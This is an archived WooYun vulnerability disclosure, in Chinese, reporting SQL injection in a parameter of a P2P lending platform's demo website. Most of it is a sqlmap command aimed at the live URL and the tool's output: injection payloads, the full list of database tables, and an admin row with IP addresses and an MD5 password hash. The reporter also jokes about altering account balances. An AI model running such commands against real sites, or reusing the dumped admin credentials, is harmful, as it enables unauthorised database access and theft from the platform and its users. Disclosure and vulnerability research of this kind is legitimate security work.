乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-07: 细节已通知厂商并且等待厂商处理中 2014-05-12: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-07-06: 细节向核心白帽子及相关领域专家公开 2014-07-16: 细节向普通白帽子公开 2014-07-26: 细节向实习白帽子公开 2014-08-02: 细节向公众公开
不描述了,忙着去改金额=。=
注入点:http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1
GET参数value未有效过滤导致存在注入这是你们家的官网产品演示站对吧?通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复!
python sqlmap.py -u "http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1" --batch -p "value" --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: value Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND 4357=4357 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 UNION ALL SELECT NULL,CONCAT(0x71666b6271,0x59784658734a4b746348,0x7165616971),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND SLEEP(5)---[21:47:58] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debian 6.0 (squeeze)web application technology: PHP 5.3.3, Apache 2.2.16back-end DBMS: MySQL 5.0.11[21:47:58] [INFO] fetching database namesavailable databases [2]:[*] information_schema[*] www.diyou.ccDatabase: www.diyou.cc+-------------------+---------+| Table | Entries |+-------------------+---------+| diyou_users | 739 || diyou_users_admin | 40 || ... | ... |+-------------------+---------+Database: www.diyou.cc[154 tables]+-----------------------------+| diyou_account || diyou_account_balance || diyou_account_bank || diyou_account_cash || diyou_account_fee || diyou_account_fee_type || diyou_account_log || diyou_account_payment || diyou_account_recharge || diyou_account_users || diyou_account_users_bank || diyou_account_web || diyou_approve || diyou_approve_edu || diyou_approve_edu_id5 || diyou_approve_id5 || diyou_approve_realname || diyou_approve_sms || diyou_approve_smslog || diyou_approve_video || diyou_areas || diyou_articles || diyou_articles_pages || diyou_articles_type || diyou_attestations || diyou_attestations_type || diyou_attestations_user || diyou_borrow || diyou_borrow_activity || diyou_borrow_amount || diyou_borrow_amount_apply || diyou_borrow_amount_log || diyou_borrow_amount_type || diyou_borrow_apply || diyou_borrow_auto || diyou_borrow_autolog || diyou_borrow_care || diyou_borrow_change || diyou_borrow_count || diyou_borrow_count_log || diyou_borrow_credit || diyou_borrow_fee || diyou_borrow_fee_loan || diyou_borrow_fee_log || diyou_borrow_fee_type || diyou_borrow_flag || diyou_borrow_frost || diyou_borrow_newtype || diyou_borrow_preview || diyou_borrow_recover || diyou_borrow_repay || diyou_borrow_roam || diyou_borrow_style || diyou_borrow_tender || diyou_borrow_tender_auto || diyou_borrow_tender_autolog || diyou_borrow_tender_web || diyou_borrow_type || diyou_borrow_verify || diyou_borrow_vouch || diyou_borrow_vouch_recover || diyou_borrow_vouch_repay || diyou_comment || diyou_comments || diyou_credit || diyou_credit_class || diyou_credit_log || diyou_credit_rank || diyou_credit_type || diyou_dw_activity_review || diyou_email || diyou_email_log || diyou_email_port || diyou_email_sendlog || diyou_group || diyou_group_articles || diyou_group_comments || diyou_group_log || diyou_group_member || diyou_group_type || diyou_linkages || diyou_linkages_class || diyou_linkages_type || diyou_links || diyou_links_type || diyou_message || diyou_message_receive || diyou_modules || diyou_phone || diyou_phone_log || diyou_phone_port || diyou_phone_smslog || diyou_rating_assets || diyou_rating_company || diyou_rating_contact || diyou_rating_educations || diyou_rating_finance || diyou_rating_houses || diyou_rating_info || diyou_rating_job || diyou_remind || diyou_remind_log || diyou_remind_type || diyou_remind_user || diyou_scrollpic || diyou_scrollpic_type || diyou_site || diyou_site_menu || diyou_sms_type || diyou_spread_add || diyou_spread_log || diyou_spreads_log || diyou_spreads_set || diyou_spreads_users || diyou_sysauto_auto || diyou_sysauto_log || diyou_system || diyou_system_type || diyou_trust || diyou_trust_borrow || diyou_trust_cash || diyou_trust_gopay || diyou_trust_ips || diyou_trust_recharge || diyou_trust_repay || diyou_trust_tender || diyou_ucenter || diyou_ucenter_set || diyou_users || diyou_users_admin || diyou_users_admin_login || diyou_users_admin_type || diyou_users_adminlog || diyou_users_care || diyou_users_care_user || diyou_users_email || diyou_users_email_log || diyou_users_examines || diyou_users_friends || diyou_users_friends_invite || diyou_users_friends_type || diyou_users_info || diyou_users_log || diyou_users_qq || diyou_users_rebut || diyou_users_reglog || diyou_users_return_log || diyou_users_set || diyou_users_sina || diyou_users_type || diyou_users_upfiles || diyou_users_vip || diyou_users_viplog || diyou_users_visit |+-----------------------------+database: www.diyou.cctable: diyou_users_admin[22:32:07] [INFO] resumed: 222.79.78.248[22:32:07] [INFO] resumed: 1399448942[22:32:07] [INFO] resumed: 2114[22:32:07] [INFO] resumed: 320cb834bb58ab7d63ca5f8a21729988[22:32:26] [INFO] resumed: 1[22:32:26] [INFO] resumed: 120.36.190.40[22:32:26] [INFO] resumed: 1398240030[22:32:26] [INFO] resumed: 1[22:32:26] [INFO] resumed: 127.0.0.1[22:32:26] [INFO] resumed: 1386036527.....................................id | user_id | type_id | qq | city | addip | phone | remark | purview | addtime | province | login_ip | password | adminname | update_ip | login_time | logintimes | update_time |+----+---------+---------+---------+------+-----------+---------+---------+---------+------------+----------+---------------+----------------------------------+-----------+---------------+------------+------------+-------------+| 1 | 1 | 1 | <blank> | 1326 | <blank> | <blank> | <blank> | <blank> | <blank> | 1310 | 222.79.78.248 | 320cb834bb58ab7d63ca5f8a21729988 .....................................射出数据,只是时间问题,这里我就不跑了!
有效过滤
危害等级:无影响厂商忽略
忽略时间:2014-08-02 23:18
2014-05-13:谢谢,刚看到。